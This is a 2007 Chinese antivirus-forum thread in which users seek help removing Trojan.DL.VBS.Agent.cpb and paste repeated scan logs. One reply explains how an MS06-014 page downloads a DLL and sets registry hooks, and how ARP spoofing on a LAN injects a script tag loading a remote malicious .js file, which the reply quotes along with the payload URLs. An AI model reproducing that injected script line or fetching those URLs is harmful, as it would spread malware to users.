瑞星卡卡安全论坛在线技术支持在线技术支持[已关闭] 【求助】怎么杀绝Trojan.DL.VBS.Agent.cpb?

1   1  /  1  页   跳转

【求助】怎么杀绝Trojan.DL.VBS.Agent.cpb?

收藏
伊唐
头像
初生襁褓狮
  • 帖子:34
  • 注册: 2003-04-13
  • 来自:
发表于: 2007-06-07 10:05 | 只看楼主 短消息 资料
字号: 1楼

【求助】怎么杀绝Trojan.DL.VBS.Agent.cpb?

这个该死的病毒Trojan.DL.VBS.Agent.cpb怎么这么厉害啊?2006版杀不死,昨天买的2007也杀不死!!!病毒已经钻进杀素软件里了,一点击瑞星就出现这个病毒!怎么办啊?
病毒名称    处理结果    发现日期    扫描方式    路径    文件
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 08:57    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    3260185611896.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:30    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    2992187446904.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:31    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    2224187446904.tmp
Trojan.DL.VBS.Agent.cpb    忽略    2007-06-07 09:31    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\VU3155R7    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:31    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\QUF9P7L7    w[1].js
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:31    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    3900187446904.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:32    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    3576187446904.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:33    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    3584187446904.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:37    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    2384187446904.tmp
Trojan.DL.VBS.Agent.cpb    跳过脚本    2007-06-07 09:37    网页/脚本监控    D:\DOCUME~1\hshjuan\LOCALS~1\Temp    3200187446904.tmp
Trojan.DL.VBS.Agent.cpb    忽略    2007-06-07 09:40    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\STUFG9A3    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:40    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\QUF9P7L7    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:40    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\49KZCJGF    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:40    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\KDIBWLAB    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:40    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\QUF9P7L7    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:41    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\KDIBWLAB    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:41    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\XF3RP9WE    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:41    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\KLU3KPAJ    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:41    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\PGVIZBLR    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:42    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\CZQF6TA5    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:42    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\2HSZ69KL    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:42    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\9AJ5TEWQ    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:42    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\CZP3IANX    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:42    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\TB3F51CE    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:43    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\49KZCJGF    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:43    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\TB3F51CE    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:44    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\KLU3KPAJ    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:44    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\TB3F51CE    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:45    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\W9AF8XY3    w[1].js
Trojan.DL.VBS.Agent.cpb    重新启动计算机后删除文件    2007-06-07 09:45    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\TB3F51CE    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:45    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\PGVIZBLR    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:45    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\KDIBWLAB    w[1].js
Trojan.DL.VBS.Agent.cpb    删除成功    2007-06-07 09:46    文件监控    D:\Documents and Settings\hshjuan\Local Settings\Temporary Internet Files\Content.IE5\QUF9P7L7    w[1].js
-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
最后编辑2007-06-09 02:29:43.967000000
分享到:
gototop
 
鑫鑫520
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2007-06-06
  • 来自:
发表于: 2007-06-07 16:20 | 短消息 资料
字号: 2楼

哈,就是这个病毒,杀不死的,瑞星刚提示C盘杀毒完成后,过不了一会儿,马上就又来了,而且这个病毒会把防火墙关掉.去年就有发现这个病毒会把防火墙关掉了,到今年瑞星的防火墙还是会被这个病毒关掉,你们的技术员都白领工资不干活了-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
gototop
 
好想变小
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-06-08
  • 来自:
发表于: 2007-06-08 14:01 | 短消息 资料
字号: 3楼

我也是这个病毒,也是一样.杀了再有..用瑞星怎么也杀不干净...99999999999999999999999-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
gototop
 
好想变小
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-06-08
  • 来自:
发表于: 2007-06-08 15:19 | 短消息 资料
字号: 4楼

该网页利用MS06-014漏洞,下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll,并直接写入注册表
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
指向C:\WINDOWS\winhelp.dll

由于瑞星查杀了k.js,一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒,原因是:
局域网中有电脑中了此毒,然后向局域网中其他电脑发动ARP攻击,将其他用户接收到的网络数据包中加入
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代码,导致其他用户访问任何网站时都会报毒。

所以,首先,确认你的电脑是否中毒:
确认以下注册表路径是否存在:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在,尝试在安全模式下删除这两个注册表路径。

如果不存在,说明不是你本机的中毒问题,而是你受到ARP攻击的缘故。
这种情况下,请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑,然后将其断网查毒。

对于客户端上网流程和“网页挂马”的几种方式分析可参考
http://hi.baidu.com/litiejun/blog/item/049d703d4f64ffef3c6d9738.html
其中所提到的:
攻击点:1.在客户端(网民)主机或网络中发送攻击代码,比如ARP攻击,插入恶意代码,诱使用户访问攻击者指定的站点,这时会影响该客户端或其所在的网络
正是本帖用户所面临的情况。

-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
gototop
 
好想变小
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-06-08
  • 来自:
发表于: 2007-06-08 15:20 | 短消息 资料
字号: 5楼

以上内容引自http://forum.ikaka.com/topic.asp?board=28&artid=8320300&page=3-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
gototop
 
o李南南o
头像
初生襁褓狮
  • 帖子:5
  • 注册: 2007-06-09
  • 来自:
发表于: 2007-06-09 02:29 | 短消息 资料
字号: 6楼

这个病毒是可以清除的.下载一个Unlocker和瑞星一起使用即可删除.先用瑞星杀毒在重启后删除那行上右键选查找目标文件.在目标文件上右健选Unlocker在弹出对话上选全部解锁即弹出瑞星对话选清除病毒或删除即可.(Unlocker在百度上搜即可)一个一个地删.最后再用瑞星查到没有毒后创建还原点或用瑞星硬盘数据备份.用一键还原备份后保存到cd更好.-›&dot†¢ð{1£bbs.ikaka.com—N½Pxß³L
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT